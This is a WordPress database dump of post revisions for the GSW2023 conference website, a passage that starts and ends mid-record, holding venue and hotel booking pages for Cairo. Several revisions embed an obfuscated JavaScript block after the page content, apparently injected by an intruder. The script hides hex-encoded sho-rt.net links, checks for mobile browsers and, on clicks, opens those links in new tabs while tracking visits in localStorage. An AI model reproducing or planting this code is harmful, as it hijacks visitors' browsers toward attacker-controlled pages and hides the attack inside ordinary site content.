_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-28 18:45:41','2023-07-28 18:45:41','',3066,'https://gsw2023.com/?p=5058',0,'revision','',0),
(5059,1,'2023-07-28 18:47:38','2023-07-28 18:47:38','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<h5 class=\"clear\"><span style=\"font-family: droid-serif; color: #3366ff;\"><strong><a style=\"color: #3366ff;\"><span style=\"font-size: 12pt;\">GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS</span> </a></strong></span></h5>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo. For more information about the conference venue, please visit the conference web site <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/\">https://gsw2023.com/</a>.</span></strong></li>\n</ul>\n</li>\n<li style=\"list-style-type: none;\">\n<ul>\n<li><strong>Hotels Special Rate Booking is Opened Now Deadline for the Special Rates is August 10, 2023. </strong></li>\n</ul>\n</li>\n</ul>\n</div>\n<p>[/vc_column_text][vc_btn title=\"BOOK NOW\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-07-28 18:47:38','2023-07-28 18:47:38','',2679,'https://gsw2023.com/?p=5059',0,'revision','',0),
(5060,1,'2023-07-28 18:50:01','2023-07-28 18:50:01','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" 